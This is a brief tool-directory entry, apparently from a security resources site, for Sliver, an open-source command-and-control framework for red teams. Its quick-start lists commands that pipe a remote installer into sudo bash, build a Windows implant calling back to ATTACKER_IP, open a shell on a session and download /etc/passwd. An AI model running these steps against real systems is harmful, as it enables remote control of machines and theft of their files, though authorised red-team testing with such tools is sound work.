Tools & Utility
Sliver
Open-source cross-platform adversary emulation and C2 framework written in Go.
#c2#red-team#open-source#go
Sliver: Open-Source C2 Framework
Sliver is an open-source, cross-platform adversary emulation and C2 framework written in Go.
Features
- Cross-platform implants (Windows, macOS, Linux)
- Multiple C2 protocols (mTLS, HTTP(S), DNS, WireGuard)
- Dynamic code generation
- Armory for extensions
- Built-in multiplayer mode
Getting Started
bash
# Install
curl https://sliver.sh/install | sudo bash
Start
sliver-server
Generate implant
generate --mtls ATTACKER_IP --os windows --arch amd64
Start listener
mtls --lport 8888
Interact
use SESSION_ID
info
shell
download /etc/passwd
upload /path/to/file